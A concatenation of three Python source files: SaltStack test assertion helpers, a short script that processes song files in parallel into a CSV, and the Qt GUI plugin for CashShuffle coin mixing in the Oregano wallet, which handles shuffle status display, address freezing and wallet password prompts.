return self.assertIn(
in_comment, self.__getWithinSaltReturn(ret, 'comment')
)
def assertNotInSaltComment(self, not_in_comment, ret):
return self.assertNotIn(
not_in_comment, self.__getWithinSaltReturn(ret, 'comment')
)
def assertSaltCommentRegexpMatches(self, ret, pattern):
return self.assertInSaltReturnRegexpMatches(ret, pattern, 'comment')
    def assertInSaltStateWarning(self, in_comment, ret):
return self.assertIn(
in_comment, self.__getWithinSaltReturn(ret, 'warnings')
)
def assertNotInSaltStateWarning(self, not_in_comment, ret):
return self.assertNotIn(
not_in_comment, self.__getWithinSaltReturn(ret, 'warnings')
)
def assertInSaltReturn(self, item_to_check, ret, keys):
return self.assertIn(
item_to_check, self.__getWithinSaltReturn(ret, keys)
)
def assertNotInSaltReturn(self, item_to_check, ret, keys):
return self.assertNotIn(
item_to_check, self.__getWithinSaltReturn(ret, keys)
)
def assertInSaltReturnRegexpMatches(self, ret, pattern, keys=()):
return self.assertRegexpMatches(
self.__getWithinSaltReturn(ret, keys), pattern
)
def assertSaltStateChangesEqual(self, ret, comparison, keys=()):
keys = ['changes'] + self.__return_valid_keys(keys)
return self.assertEqual(
self.__getWithinSaltReturn(ret, keys), comparison
)
def assertSaltStateChangesNotEqual(self, ret, comparison, keys=()):
keys = ['changes'] + self.__return_valid_keys(keys)
return self.assertNotEqual(
self.__getWithinSaltReturn(ret, keys), comparison
)
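# Hedged usage sketch (illustrative only, not part of the original file): the
# assertion helpers above expect the dictionary shape returned by
# state.single / state.sls, keyed by state id, for example:
#
#     ret = self.run_state('file.touch', name='/tmp/salt-test-file')
#     # ret looks roughly like:
#     # {'file_|-/tmp/salt-test-file_|-/tmp/salt-test-file_|-touch':
#     #     {'result': True, 'comment': '...', 'changes': {...}}}
#     self.assertSaltTrueReturn(ret)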
|
threadingScript.py
|
#!/usr/bin/env python
import os, sys
import threading
from Processor import Processor
from multiprocessing import Process, Queue
from view import getUser
def ThreadsSongs(user):
pro = Processor()
path = sys.argv[1]
q = Queue()
if not (path.endswith("/")):
path = path + "/"
imgPath = path + "img/"
if not os.path.exists(imgPath):
os.makedirs(imgPath)
files = os.listdir(path)
i = 0
threadList = list()
    songsListPath = SESSION + str(user) + '.csv'  # TODO: still need to insert the username between the '+' signs
songsList=open(songsListPath,'w')
songsList.close()
for x in files:
print "Processing song %d: " % i + x
p = Process(target=pro.process_song, args=(path,imgPath,x,q))
threadList.append(p)
p.start()
i += 1
for p in threadList:
songsList = open(songsListPath, 'a')
d = q.get()
songsList.write(d)
songsList.close()
p.join()
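# Hedged usage sketch (illustrative only; the SESSION constant and the calling
# module are assumptions, not shown in this file): the function expects the
# songs directory as the first command-line argument, e.g.
#
#     python threadingScript.py /path/to/songs/
#
# and is then invoked as ThreadsSongs(user) with the current user's id.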
|
qt.py
|
#!/usr/bin/env python3
#
# Cash Shuffle - CoinJoin for Ergon
# Copyright (C) 2018-2019 Oregano LLC
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import os
import sys
import json
import copy
import socket
import time
import threading
import queue
from PyQt5.QtGui import *
from PyQt5.QtCore import *
from PyQt5.QtWidgets import *
from oregano import networks
from oregano.plugins import BasePlugin, hook
from oregano.i18n import _
from oregano.util import print_error, profiler, PrintError, Weak, format_satoshis_plain, finalization_print_error
from oregano.network import Network
from oregano.address import Address
from oregano.transaction import Transaction
from oregano.simple_config import SimpleConfig, get_config
from oregano.wallet import Abstract_Wallet
from oregano_gui.qt.util import EnterButton, CancelButton, Buttons, CloseButton, HelpLabel, OkButton, rate_limited, ColorScheme, destroyed_print_error, AppModalDialog
from oregano_gui.qt.password_dialog import PasswordDialog
from oregano_gui.qt.main_window import ElectrumWindow
from oregano_gui.qt.amountedit import BTCAmountEdit
from oregano_gui.qt.utils import FixedAspectRatioSvgWidget
from .client import BackgroundShufflingThread, ERR_SERVER_CONNECT, ERR_BAD_SERVER_PREFIX, MSG_SERVER_OK
from .comms import query_server_for_stats, verify_ssl_socket
from .conf_keys import ConfKeys # config keys per wallet and global
from .coin_utils import CoinUtils
def is_coin_busy_shuffling(window, utxo_or_name):
''' Convenience wrapper for BackgroundShufflingThread.is_coin_busy_shuffling '''
bp = getattr(window, 'background_process', None)
return bool(bp and bp.is_coin_busy_shuffling(utxo_or_name))
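# Hedged usage sketch (illustrative only): GUI code can use this wrapper to
# guard spend/freeze actions on coins that are mid-shuffle, e.g.
#
#     if is_coin_busy_shuffling(window, coin_name):
#         return  # skip this coin; a shuffle round is using it right now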
def network_callback(window, event, *args):
''' This gets called in the network thread. It should just emit signals to GUI
if it is to do any GUI work. '''
if event == 'new_transaction':
if len(args) == 2 and hasattr(window, 'wallet') and args[1] is window.wallet and args[0]:
window._shuffle_sigs.tx.emit(window, args[0])
def my_custom_item_setup(utxo_list, item, utxo, name):
if not hasattr(utxo_list.wallet, 'is_coin_shuffled'):
return
prog = utxo_list.in_progress.get(name, "")
frozenstring = item.data(0, utxo_list.DataRoles.frozen_flags) or ""
is_reshuffle = name in utxo_list.wallet._reshuffles
is_slp = 's' in frozenstring
u_value = utxo['value']
if is_slp:
item.setText(5, _("SLP Token"))
elif not is_reshuffle and utxo_list.wallet.is_coin_shuffled(utxo): # already shuffled
item.setText(5, _("Shuffled"))
elif not is_reshuffle and utxo['address'] in utxo_list.wallet._shuffled_address_cache: # we hit the cache directly as a performance hack. we don't really need a super-accurate reply as this is for UI and the cache will eventually be accurate
item.setText(5, _("Shuffled Addr"))
elif not prog and ("a" in frozenstring or "c" in frozenstring):
item.setText(5, _("Frozen"))
elif u_value >= BackgroundShufflingThread.UPPER_BOUND: # too big
item.setText(5, _("Too big"))
elif u_value < BackgroundShufflingThread.LOWER_BOUND: # too small
item.setText(5, _("Too small"))
elif utxo['height'] <= 0: # not_confirmed
if is_reshuffle:
item.setText(5, _("Unconfirmed (reshuf)"))
else:
item.setText(5, _("Unconfirmed"))
elif utxo['coinbase']: # we disallow coinbase coins unconditionally -- due to miner feedback (they don't like shuffling these)
item.setText(5, _("Coinbase"))
elif (u_value >= BackgroundShufflingThread.LOWER_BOUND
and u_value < BackgroundShufflingThread.UPPER_BOUND): # queued_labels
window = utxo_list.parent
if (window and window.background_process and utxo_list.wallet.network
and utxo_list.wallet.network.is_connected()):
if window.background_process.get_paused():
item.setText(5, _("Paused"))
else:
if is_reshuffle:
item.setText(5, _("In queue (reshuf)"))
else:
item.setText(5, _("In queue"))
else:
item.setText(5, _("Offline"))
if prog == 'in progress': # in progress
item.setText(5, _("In progress"))
elif prog.startswith('phase '):
item.setText(5, _("Phase {}").format(prog.split()[-1]))
elif prog == 'wait for others': # wait for others
item.setText(5, _("Wait for others"))
elif prog.startswith("got players"): # got players > 1
num, tot = (int(x) for x in prog.rsplit(' ', 2)[-2:])
txt = "{} ({}/{})".format(_("Players"), num, tot)
item.setText(5, txt)
elif prog == "completed":
item.setText(5, _("Done"))
def my_custom_utxo_context_menu_setup(window, utxo_list, menu, selected):
''' Adds CashShuffle related actions to the utxo_list context (right-click)
menu '''
wallet = window.wallet
shuffled_selected = [name for name,flags in selected.items()
if (not flags
and wallet.is_coin_shuffled(CoinUtils.coin_name_to_dict(name))
and name not in wallet._reshuffles)]
reshuffles_selected = [name for name in selected if name in wallet._reshuffles]
menu.addSection(_('CashShuffle'))
def on_reshuffle():
wallet._reshuffles.update(set(shuffled_selected))
utxo_list.update()
def on_cancel_reshuffles():
wallet._reshuffles.difference_update(set(reshuffles_selected))
utxo_list.update()
len_shufs, len_reshufs = len(shuffled_selected), len(reshuffles_selected)
if len_shufs:
if len_shufs == 1:
action = menu.addAction(_('Reshuffle Coin'), on_reshuffle)
else:
action = menu.addAction(_('Reshuffle {} Shuffled').format(len_shufs), on_reshuffle)
if len_reshufs:
if len_reshufs == 1:
action = menu.addAction(_('Cancel Reshuffle'), on_cancel_reshuffles)
else:
action = menu.addAction(_('Cancel {} Reshuffles').format(len_reshufs), on_cancel_reshuffles)
def _make_label(window, tot, shufamt, chg, fee, scale):
is_dusty_fee = not chg and fee - BackgroundShufflingThread.FEE > 0
# fixoshis -> display format
tot, shufamt, chg = window.format_amount(tot), window.format_amount(shufamt), window.format_amount(chg) if chg else ''
chgtxt = " + {} ".format(chg) if chg else " "
# Note it's important that the "Shuffle" prefix not be translated because we use it elsewhere
# in the filter shuffle history callback... and it's also a "proper name" :)
return ( "Shuffle" + (" {} {} {} {}{}(-{} fixs {})"
.format(tot, window.base_unit(),
BackgroundShufflingThread.SCALE_ARROW_DICT.get(scale, BackgroundShufflingThread.SCALE_ARROW_UNKNOWN),
shufamt, chgtxt, fee, _("fee") if not is_dusty_fee else _("dusty fee")
)
)
)
def update_coin_status(window, coin_name, msg):
if getattr(window.utxo_list, "in_progress", None) is None:
return
#print_error("[shuffle] wallet={}; Coin {} Message '{}'".format(window.wallet.basename(), coin_name, msg.strip()))
prev_in_progress = window.utxo_list.in_progress.get(coin_name)
new_in_progress = prev_in_progress
msg = msg or '' # force str
coin_name = coin_name or '' # force str
if coin_name not in ("MAINLOG", "PROTOCOL"):
if msg.startswith("Player"):
if "get session number" in msg:
new_in_progress = 'wait for others'
elif 'joined the pool' in msg:
try:
num = int(msg.split(' ', 2)[1])
if num > 1:
# got more players than just self
new_in_progress = 'got players {} {}'.format(num, window.background_process.poolSize)
except (ValueError, IndexError):
pass
elif "begins CoinShuffle protocol" in msg:
new_in_progress = 'in progress'
elif "reaches phase" in msg:
pos = msg.find("reaches phase")
parts = msg[pos:].split(' ', 2)
try:
phase = int(parts[2])
new_in_progress = 'phase {}'.format(phase)
except (IndexError, ValueError):
pass
elif msg.endswith("complete protocol"):
new_in_progress = "completed" # NB: these don't leak. they eventually get cleaned up by the 'forget ' command from the background thread after some time
elif msg.startswith("Error"):
new_in_progress = None # flag to remove from progress list
if ERR_SERVER_CONNECT in msg or ERR_BAD_SERVER_PREFIX in msg:
window.cashshuffle_set_flag(1) # 1 means server connection issue
elif msg.startswith("Blame") and "insufficient" not in msg and "wrong hash" not in msg:
new_in_progress = None
elif msg.startswith("shuffle_txid:"): # TXID message -- call "set_label"
words = msg.split()
label = _("CashShuffle") # fallback on parse error
if len(words) >= 2:
txid = words[1]
try:
tot, shufamt, chg, fee, scale = [int(w) for w in words[2:7]] # parse fixoshis
label = _make_label(window, tot, shufamt, chg, fee, scale)
except (IndexError, ValueError, TypeError) as e:
# Hmm. Some sort of parse error. We'll label it 'CashShuffle'
window.print_error("*** WARNING: Could not parse shuffle_txid message:", str(e), msg)
window.wallet.set_label(txid, label)
Plugin._increment_shuffle_counter(window)
window.update_wallet()
elif msg.startswith("add_tentative_shuffle:"):
# add_tentative_shuffle: utxo outaddr tot scale chg fee
# This is a mechanism as a workaround for issue #70 -- it's possible for last player to delay and cause other players to miss the txid.
try:
words = msg.split()
utxo, addr = words[1:3]
tot, shufamt, chg, fee, scale = [int(x) for x in words[3:8]] # parse fixoshis
window._shuffle_tentative[utxo] = (addr, tot, shufamt, chg, fee, scale) # remember this tentative shuffle so we can generate a label for it if we see a matching tx come in later
except (IndexError, ValueError, TypeError) as e:
# Some sort of parse error...
window.print_error("*** WARNING: Could not parse add_tentative_shuffle message:", str(e), msg)
elif msg.startswith("del_tentative_shuffle:"):
try:
utxo = msg.split()[1]
window._shuffle_tentative.pop(utxo, None) # tolerate del commands for missing values from dict
except IndexError as e:
# Some sort of parse error...
window.print_error("*** WARNING: Could not parse del_tentative_shuffle message:", str(e), msg)
if not msg.startswith("Error") and not msg.startswith("Exit"):
window.cashshuffle_set_flag(0) # 0 means ok
elif new_in_progress != 'completed' and prev_in_progress == new_in_progress: # "Exit" or "Error"
# thread exit or error without completing protocol, set status back to 'in queue'
# -- fixes wrong status of 'in progress' and 'waiting for others' being shown in UI for dead threads
new_in_progress = None
else:
if msg == "stopped":
window.utxo_list.in_progress.clear(); new_in_progress = prev_in_progress = None
elif msg.startswith("forget "):
words = msg.strip().split()
prev_in_progress = 1; new_in_progress = None; coin_name = words[-1] # force the code below to pop the coin that we were asked to forget from the status dict
elif ERR_SERVER_CONNECT in msg:
new_in_progress = None # flag to remove from progress list
window.cashshuffle_set_flag(1) # 1 means server connection issue
elif MSG_SERVER_OK in msg:
new_in_progress = None
window.cashshuffle_set_flag(0) # server is ok now.
if prev_in_progress != new_in_progress:
if new_in_progress is None:
window.utxo_list.in_progress.pop(coin_name, None)
else:
window.utxo_list.in_progress[coin_name] = new_in_progress
window.utxo_list.update()
def _got_tx_check_tentative_shuffles(window, tx):
''' GUI thread: Got a new transaction for a window, so see if we should
apply the shuffle_tentative label to it. The below mechanism is a
workaround for bug #70. '''
t = getattr(window, '_shuffle_tentative', None)
if not t:
# Most of the time this code path is taken as the dict is usually empty.
# It only ever has entries when a shuffle failed at phase 4.
return
inputs, outputs = tx.inputs(), tx.outputs()
for utxo, info in t.copy().items():
# loop through all of the "tentative tx's" we have. this dict should be very small,
# it only contains entries for shuffles that timed out in phase 4 where last player took too long (bug #70)
addr, tot, amt, chg, fee, scale = info
for txin in inputs:
if CoinUtils.get_name(txin) == utxo:
# found the coin in the incoming tx. Now make sure it's our anticipated shuffle tx that failed and not some other tx, so we apply the correct label only when it's the phase-4-failed shuffle tx.
for n, txout in enumerate(outputs):
# Search the outputs of this tx to make sure they match what we expected for scale, out_addr...
typ, _addr, amount = txout
# the below checks make sure it matches what we expected from the failed shuffle, and also that the coin is shuffled (paranoia check).
if isinstance(_addr, Address) and amount == amt and _addr.to_storage_string() == addr:
txid = tx.txid()
if CoinUtils.is_coin_shuffled(window.wallet, {'prevout_hash':txid, 'prevout_n':n, 'address':_addr, 'value':amount}, {txid: tx}):
# all checks pass -- we successfully recovered from bug #70! Hurray!
window.wallet.set_label(txid, _make_label(window, tot, amt, chg, fee, scale))
Plugin._increment_shuffle_counter(window)
window.print_error("CashShuffle: found coin {} in tentative shuffle cache, applied label".format(utxo))
window.update_wallet()
else:
# hmm. this branch is very very unlikely.
window.print_error("CashShuffle: found coin {} in shuffle cache, but its tx is not a shuffle tx; label not applied".format(utxo))
break
else:
# This coin was spent in this tx, but it appears to not be the tx we anticipated.. Last player didn't broadcast and we spent it later (perhaps as a re-shuffle or other).
window.print_error("CashShuffle: removing spent coin {} from tentative shuffle cache, label not applied".format(utxo))
t.pop(utxo) # unconditionally remove this tentative coin from the dict since either way it's spent
return
def _got_tx_check_if_spent_shuffled_coin_and_freeze_used_address_etc(window, tx):
''' Freeze address after spending from a shuffled coin address for privacy (issue #100).
Also remove any shuffled coin spends from the _is_shuffled_cache. '''
inputs = tx.inputs()
addrs_to_freeze = set()
coins_to_purge_from_shuffle_cache = list()
coins_to_purge_from_reshuffles = set()
wallet = window.wallet
all_addresses = None
def is_mine(a):
''' This is faster than calling wallet.is_mine on *each* input
as that involves a lot of rebuilding of the addresses list for each call.
Also we use a set here which is faster than O(n) list lookup.
This matters on huge tx's with many inputs as a speedup.'''
nonlocal all_addresses
if all_addresses is None:
all_addresses = set(wallet.get_addresses())
return a in all_addresses
for inp in inputs:
addr = inp['address']
if isinstance(addr, Address) and is_mine(addr):
# This coin was ours, purge True/False results from the
# _is_shuffled_cache for this coin.
name = CoinUtils.get_name(inp)
coins_to_purge_from_shuffle_cache.append(name)
coins_to_purge_from_reshuffles.add(name)
if addr not in addrs_to_freeze and wallet.is_coin_shuffled(inp):
# We spent a shuffled coin belonging to us.
# Freeze that address to protect privacy.
addrs_to_freeze.add(addr)
if addrs_to_freeze:
change_addr_set = set(wallet.get_change_addresses())
addrs_to_freeze2 = addrs_to_freeze & change_addr_set # we *ONLY* freeze if change address. see #1291
if addrs_to_freeze2:
wallet.set_frozen_state(addrs_to_freeze2, True)
for addr in addrs_to_freeze2:
name = addr.to_storage_string()
if not wallet.labels.get(name): # only put a label in there if no label there already
wallet.set_label(name, _("Shuffled coin spent (frozen for privacy)"))
# the below is to prevent the "is_shuffled_cache" from growing forever which
# impacts performance and wastes memory. Since we were checking a seen TX
# anyway, might as well expire coins from the cache that were spent.
# remove_from_shufflecache acquires locks as it operates on the cache.
CoinUtils.remove_from_shufflecache(wallet, coins_to_purge_from_shuffle_cache)
# "forget" that these addresses were designated as shuffled addresses.
CoinUtils.remove_from_shuffled_address_cache(wallet, addrs_to_freeze)
wallet._reshuffles.difference_update(coins_to_purge_from_reshuffles)
def _got_tx(window, tx):
''' Generic callback to monitor tx's received for a wallet. Note that
if this is called the tx definitely is for this window/wallet. '''
if not hasattr(window, '_shuffle_patched_'):
        # defensive programming in case this signal arrives late
# just as the user was disabling cash shuffle
# (signal arrives via QueuedConnection which is why this check is necessary)
return
_got_tx_check_tentative_shuffles(window, tx) # check for workaround to bug#70
_got_tx_check_if_spent_shuffled_coin_and_freeze_used_address_etc(window, tx) # Feature #100
# Note at this point the is_shuffled cache has had entries for inputs in
# the tx above removed. If you want to add checks to this function that
# involve the _is_shuffled_cache, do it above before the
# '_got_tx_check_if_spent_shuffled_coin_and_freeze_used_address_etc' call.
class MsgForwarder(QObject):
''' Forwards messages from BackgroundShufflingThread to the GUI thread using
Qt signal magic. See function update_coin_status above. '''
gotMessage = pyqtSignal(str, str)
def __init__(self, window):
super().__init__(None)
self.window = window
self.gotMessage.connect(self.gotMsgSlot)
def send(self, msg, sender):
self.gotMessage.emit(msg, sender)
def gotMsgSlot(self, msg, sender):
update_coin_status(self.window, sender, msg)
def disconnectAll(self):
try:
self.gotMessage.disconnect()
except:
pass
def start_background_shuffling(window, network_settings, period = 10.0, password = None, timeout = 60.0):
logger = MsgForwarder(window)
window.background_process = BackgroundShufflingThread(window,
window.wallet,
network_settings,
logger = logger,
period = period,
password = password,
timeout = timeout)
window.background_process.start()
def monkey_patches_apply(window):
def patch_window(window):
if getattr(window, '_shuffle_patched_', None):
return
window.background_process = None
window.send_tab_shuffle_extra = SendTabExtra(window)
window._shuffle_tentative = dict()
class Sigs(QObject):
tx = pyqtSignal(QObject, object)
window._shuffle_sigs = sigs = Sigs(window)
sigs.tx.connect(_got_tx)
window._shuffle_network_callback = lambda event, *args: network_callback(window, event, *args)
if window.network:
window.network.register_callback(window._shuffle_network_callback, ['new_transaction'])
window._shuffle_patched_ = True
window.force_use_single_change_addr = _("CashShuffle is enabled: change address logic will be handled by CashShuffle (to preserve privacy).")
print_error("[shuffle] Patched window")
def patch_utxo_list(utxo_list):
if getattr(utxo_list, '_shuffle_patched_', None):
return
header = utxo_list.headerItem()
header_labels = [header.text(i) for i in range(header.columnCount())]
header_labels.append(_("Shuffle status"))
utxo_list.update_headers(header_labels)
utxo_list.in_progress = dict()
utxo_list._shuffle_patched_ = True
print_error("[shuffle] Patched utxo_list")
def patch_wallet(wallet):
if getattr(wallet, '_shuffle_patched_', None):
return
wallet.is_coin_shuffled = lambda coin, txs=None: CoinUtils.is_coin_shuffled(wallet, coin, txs)
wallet.get_shuffled_and_unshuffled_coins = lambda *args, **kwargs: CoinUtils.get_shuffled_and_unshuffled_coins(wallet, *args, **kwargs)
wallet.cashshuffle_get_new_change_address = lambda for_shufflethread=False: CoinUtils.get_new_change_address_safe(wallet, for_shufflethread=for_shufflethread)
wallet._is_shuffled_cache = dict()
wallet._shuffled_address_cache = set()
wallet._addresses_cashshuffle_reserved = set()
wallet._reshuffles = set()
wallet._last_change = None
CoinUtils.load_shuffle_change_shared_with_others(wallet) # sets wallet._shuffle_change_shared_with_others
# Paranoia -- force wallet into this single change address mode in case
# other code (plugins, etc) generate tx's. We don't want tx generation
# code to clobber our shuffle tx output addresses.
change_addr_policy_1 = (bool(wallet.storage.get('use_change')), bool(wallet.storage.get('multiple_change')))
change_addr_policy_2 = (bool(wallet.use_change), bool(wallet.multiple_change))
desired_policy = (True, False)
if any(policy != desired_policy for policy in (change_addr_policy_1, change_addr_policy_2)):
wallet.use_change, wallet.multiple_change = desired_policy
wallet.storage.put('use_change', desired_policy[0])
wallet.storage.put('multiple_change', desired_policy[1])
wallet.print_error("CashShuffle forced change address policy to: use_change={}, multiple_change={}"
.format(desired_policy[0], desired_policy[1]))
# More paranoia -- in case app crashed, unfreeze coins frozen by last
# app run.
CoinUtils.unfreeze_frozen_by_shuffling(wallet)
wallet._shuffle_patched_ = True
print_error("[shuffle] Patched wallet")
patch_wallet(window.wallet)
patch_utxo_list(window.utxo_list)
patch_window(window)
def monkey_patches_remove(window):
def restore_window(window):
if not getattr(window, '_shuffle_patched_', None):
return
if window.network:
window.network.unregister_callback(window._shuffle_network_callback)
delattr(window, '_shuffle_network_callback')
try: window._shuffle_sigs.tx.disconnect()
except TypeError: pass
window._shuffle_sigs.deleteLater()
delattr(window, "_shuffle_sigs")
delattr(window, '_shuffle_tentative')
window.send_tab_shuffle_extra.setParent(None); window.send_tab_shuffle_extra.deleteLater();
delattr(window, 'send_tab_shuffle_extra')
delattr(window, 'background_process')
delattr(window, '_shuffle_patched_')
window.force_use_single_change_addr = None
print_error("[shuffle] Unpatched window")
# Note that at this point an additional monkey patch: 'window.__disabled_sendtab_extra__' may stick around until the plugin is unloaded altogether
def restore_utxo_list(utxo_list):
if not getattr(utxo_list, '_shuffle_patched_', None):
return
header = utxo_list.headerItem()
header_labels = [header.text(i) for i in range(header.columnCount())]
del header_labels[-1]
utxo_list.update_headers(header_labels)
utxo_list.in_progress = None
delattr(window.utxo_list, "in_progress")
delattr(window.utxo_list, '_shuffle_patched_')
print_error("[shuffle] Unpatched utxo_list")
def restore_wallet(wallet):
if not getattr(wallet, '_shuffle_patched_', None):
return
delattr(wallet, '_addresses_cashshuffle_reserved')
delattr(wallet, 'cashshuffle_get_new_change_address')
delattr(wallet, "is_coin_shuffled")
delattr(wallet, "get_shuffled_and_unshuffled_coins")
delattr(wallet, "_is_shuffled_cache")
delattr(wallet, "_shuffled_address_cache")
delattr(wallet, '_shuffle_patched_')
delattr(wallet, "_last_change")
delattr(wallet, "_reshuffles")
CoinUtils.store_shuffle_change_shared_with_others(wallet) # save _shuffle_change_shared_with_others to storage -- note this doesn't call storage.write() for performance reasons.
delattr(wallet, '_shuffle_change_shared_with_others')
CoinUtils.unfreeze_frozen_by_shuffling(wallet)
print_error("[shuffle] Unpatched wallet")
restore_window(window)
restore_utxo_list(window.utxo_list)
restore_wallet(window.wallet)
def _elide(x, maxlen=30, startlen=8):
''' Useful for eliding GUI text with an ellipsis ... in the middle '''
if len(x) > maxlen and startlen + 3 < maxlen:
return x[:startlen] + "..." + x[-(maxlen-startlen-3):]
return x
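# Example (derived from the defaults above): with maxlen=30 and startlen=8,
#     _elide('0123456789abcdefghijklmnopqrstuvwxyz')
# returns '01234567...hijklmnopqrstuvwxyz' (8 + 3 + 19 = 30 characters).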
class Plugin(BasePlugin):
instance = None # The extant instance singleton, if any. Variable is cleared on plugin stop.
gui = None # The "gui object" singleton (ElectrumGui) -- a useful refrence to keep around.
network_dialog = None # The NetworkDialog window singleton (managed by the ElectrumGui singleton).
def fullname(self):
return 'CashShuffle'
def description(self):
return _("CashShuffle Protocol")
def is_available(self):
return networks.net is not networks.TaxCoinNet
def __init__(self, parent, config, name):
BasePlugin.__init__(self, parent, config, name)
self.windows = []
self.disabled_windows = [] # this is to manage the "cashshuffle disabled" xtra gui element in the send tab
self._hide_history_txs = False
self.initted = False
def is_defunct(self):
return Plugin.instance is not self
@hook
def init_qt(self, gui):
if self.initted:
return
self.print_error("Initializing...")
Plugin.instance = self
Plugin.gui = gui
self._delete_old_keys(gui.config)
if Plugin.network_dialog != gui.nd:
Plugin.network_dialog = gui.nd # each time we are stopped, our module gets re-imported and we lose globals... so try and recapture this singleton
ct = 0
for window in gui.windows:
self.on_new_window(window)
ct += 1
        self.on_network_dialog(Plugin.network_dialog) # If we have a network dialog, add self to network dialog
self.initted = True
self._hide_history_txs = bool(gui.config.get(ConfKeys.Global.HIDE_TXS_FROM_HISTORY, False))
self.print_error("Initialized (had {} extant windows).".format(ct))
self._hide_history_txs_check()
@hook
def on_network_dialog(self, nd):
Plugin.network_dialog = nd
if not nd: return
self.print_error("OnNetworkDialog", str(nd))
if not hasattr(nd, "__shuffle_settings__") or not nd.__shuffle_settings__:
nd.__shuffle_settings__ = st = SettingsTab(parent=nd.nlayout.tabs, config=nd.nlayout.config)
nd.nlayout.tabs.addTab(st, QIcon(':icons/CashShuffleLogos/logo-vertical.svg'), _("CashShuffle"))
st.applyChanges.connect(Plugin.try_to_apply_network_dialog_settings)
elif nd.__shuffle_settings__:
# they may have a fake view if they didn't apply the last settings, refresh the view
st = nd.__shuffle_settings__
st.refreshFromSettings()
@hook
def window_update_status(self, window):
but = getattr(window, '__shuffle__status__button__', None)
if but:
but.update_cashshuffle_icon()
def show_cashshuffle_tab_in_network_dialog(self, window):
window.gui_object.show_network_dialog(window)
nd = Plugin.network_dialog
if nd and getattr(nd, '__shuffle_settings__', None):
st = nd.__shuffle_settings__
nd.nlayout.tabs.setCurrentWidget(st)
nd.activateWindow()
return True
return False
def del_network_dialog_tab(self):
# delete the shuffle settings widget
if Plugin.network_dialog and hasattr(Plugin.network_dialog, '__shuffle_settings__'):
nd = Plugin.network_dialog
st = Plugin.network_dialog.__shuffle_settings__
if st:
idx = nd.nlayout.tabs.indexOf(st)
if idx > -1:
if nd.nlayout.tabs.currentIndex() == idx:
nd.nlayout.tabs.setCurrentIndex(0)
nd.nlayout.tabs.removeTab(idx)
st.kill()
st.setParent(None)
st.deleteLater() # need to call this otherwise it sticks around :/
st = None
Plugin.network_dialog.__shuffle_settings__ = None
self.print_error("Removed CashShuffle network settings tab")
def window_has_cashshuffle(self, window):
return window in self.windows
def window_wants_cashshuffle(self, window):
return window.wallet.storage.get(ConfKeys.PerWallet.ENABLED, False)
def window_set_wants_cashshuffle(self, window, b):
window.wallet.storage.put(ConfKeys.PerWallet.ENABLED, bool(b))
def window_set_cashshuffle(self, window, b):
if not b and self.window_has_cashshuffle(window):
self._disable_for_window(window)
elif b and not self.window_has_cashshuffle(window):
self._enable_for_window(window)
self.window_set_wants_cashshuffle(window, b)
def _window_set_disabled_extra(self, window):
self._window_clear_disabled_extra(window)
window.__disabled_sendtab_extra__ = SendTabExtraDisabled(window)
def _window_clear_disabled_extra(self, window):
extra = getattr(window, "__disabled_sendtab_extra__", None)
if extra:
extra.setParent(None) # python will gc this badboy
delattr(window, "__disabled_sendtab_extra__")
del extra # hopefully object refct goes immediately to 0 and this widget dies quickly.
return True
@classmethod
def is_wallet_cashshuffle_compatible(cls, window):
from oregano.wallet import ImportedWalletBase, Multisig_Wallet
if (window.wallet.is_watching_only()
or window.wallet.is_hardware()
or isinstance(window.wallet, (Multisig_Wallet, ImportedWalletBase))):
# wallet is watching-only, multisig, or hardware so.. not compatible
return False
return True
def add_button_to_window(self, window):
if not hasattr(window, '__shuffle__status__button__'):
from .qt_status_bar_mgr import ShuffleStatusBarButtonMgr
window.__shuffle__status__button__ = ShuffleStatusBarButtonMgr(self, window)
window.print_error("Added cashshuffle status button")
@classmethod
def remove_button_from_window(cls, window):
if hasattr(window, '__shuffle__status__button__'):
window.__shuffle__status__button__.remove()
delattr(window, '__shuffle__status__button__')
window.print_error("Removed cashshuffle status button")
@hook
def on_new_window(self, window):
if not self.is_wallet_cashshuffle_compatible(window):
# wallet is watching-only, multisig, or hardware so.. mark it permanently for no cashshuffle
self.window_set_cashshuffle(window, False)
window.update_status() # this has the side-effect of refreshing the cash shuffle status bar button's context menu (which has actions even for disabled/incompatible windows)
return
self.add_button_to_window(window) # unconditionally add the button if compatible -- they may want to enable it later
if window.wallet and not self.window_has_cashshuffle(window):
if self.window_wants_cashshuffle(window):
self._enable_for_window(window) or self._window_add_to_disabled(window)
else:
self._window_add_to_disabled(window)
def _enable_for_window(self, window):
name = window.wallet.basename()
self.print_error("Window '{}' registered, performing window-specific startup code".format(name))
if window.gui_object.warn_if_no_secp(
parent=window,
message=_("CashShuffle requires libsecp; cannot enable shuffling for this wallet."),
icon=QMessageBox.Critical):
self.print_error("Refusing to enable CashShuffle for window '{}' because no libsecp :(".format(name))
return
if self.is_defunct(): return # we need to do this because presentation of above dialog box may mean user had the opportunity to close the plugin in another window
cached_password = window.gui_object.get_cached_password(window.wallet)
password = None
while window.wallet.has_password():
msg = _("CashShuffle requires access to '{}'.").format(name) + "\n" + _('Please enter your password')
if cached_password:
password = cached_password
cached_password = None
else:
pwdlg = PasswordDialog(parent=window.top_level_window(), msg=msg)
password = pwdlg.run()
if self.is_defunct(): return # we need to do this because presentation of above dialog box may mean user had the opportunity to close the plugin in another window
if password is None:
# User cancelled password input
if not self.warn_if_shuffle_disable_not_ok(window, msg=_('CashShuffle will now be <i>disabled</i> for a wallet which has previously had it <b>enabled</b>. Are you sure?')):
# User was warned and opted to try again to enable
continue
self.window_set_cashshuffle(window, False)
window.show_error(_("CashShuffle password prompt canceled; disabling for this wallet."), parent=window)
return
try:
window.wallet.check_password(password)
break
except Exception as e:
window.show_error(str(e), parent=window)
